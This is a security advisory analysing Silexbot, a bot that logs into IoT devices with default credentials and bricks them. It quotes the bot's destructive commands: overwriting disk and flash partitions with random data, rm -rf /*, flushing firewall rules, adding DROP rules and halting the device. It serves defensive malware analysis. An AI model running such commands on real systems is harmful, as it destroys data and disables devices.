SIRT Advisory: Silexbot Bricking Systems With Known Default Login Credentials
On June 25th, I discovered a new bot named Silexbot on my honeypot. The bot itself is a blunt tool used to destroy IoT devices. Its author, someone who claims to be a 14-year-old boy from Europe, has made his intentions clear with some very distinct text embedded in the code.
Since Silexbot was first discovered, the author has halted development of the botnet, as he didn't expect all of this attention and decided to quit before things get worse.
So how does Silexbot work?
Silexbot is using known default credentials for IoT devices to login and kill the system. The bot does this by writing random data from /dev/random to any mounted storage it finds. Examining binary samples collected from my honeypot, I see Silexbot calling fdisk -l which will list all disk partitions. Using that list, Silexbot then writes random data from /dev/random to any of the partitions it discovers:
busybox cat /dev/urandom >/dev/mtdblock0
busybox cat /dev/urandom >/dev/sda
busybox cat /dev/urandom >/dev/ram0
busybox cat /dev/urandom >/dev/mmc0
busybox cat /dev/urandom >/dev/mtdblock10
' ii11II += 'busybox cat /dev/urandom >/dev/mtd0 &
busybox cat /dev/urandom >/dev/sda &
busybox cat /dev/urandom >/dev/mtd1 &
busybox cat /dev/urandom >/dev/mtdblock0 &
busybox cat /dev/urandom >/dev/mtdblock1 &
busybox cat /dev/urandom >/dev/mtdblock2 &
busybox cat /dev/urandom >/dev/mtdblock3 &
Based on code examinations, it is possible that Silexbot uses an alternative method of discovery if the fdisk command isn't available. While we have not seen concrete proof of this code functioning, within the binary the commands exist for Silexbot to read mounted file systems from /proc/mounts and write to them using mtd_write::
cat /proc/mounts
cat /dev/urandom | mtd_write mtd0 - 0 32768
cat /dev/urandom | mtd_write mtd1 - 0 32768
Then it deletes network configurations, flushes iptables and adds an additional rule that DROPS all connections, before finally halting the device:
route del default;iproute del default;ip route del default;rm -rf /* 2>
/dev/null &
iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP
halt -n -f
reboot
route del default
iproute del default
ip route del default
Silexbot also uses rm -rf /, which will delete anything it has missed:
rm -rf /* 2</dev/null
Finally, Silexbot will halt and reboot the device.
halt -n -f
reboot
Silexbot is targeting any Unix-like system with default login credentials. The binary captured targets ARM devices. Additional examinations reveal a Bash shell version available to download, which currently targets any architecture running a Unix-like OS.
I noticed the Bash shell this morning, but my honeypot network is limited. The IP address that targeted my honeypot is hosted on a VPS provider's servers in Iran. However, the alleged teenager developing the code has claimed to be located in Europe in media interviews and hasn't expressed anything that would suggest Silexbot is retaliatory, which some have speculated. His stated motive was to solely take down infection targets of other botnets and their authors.
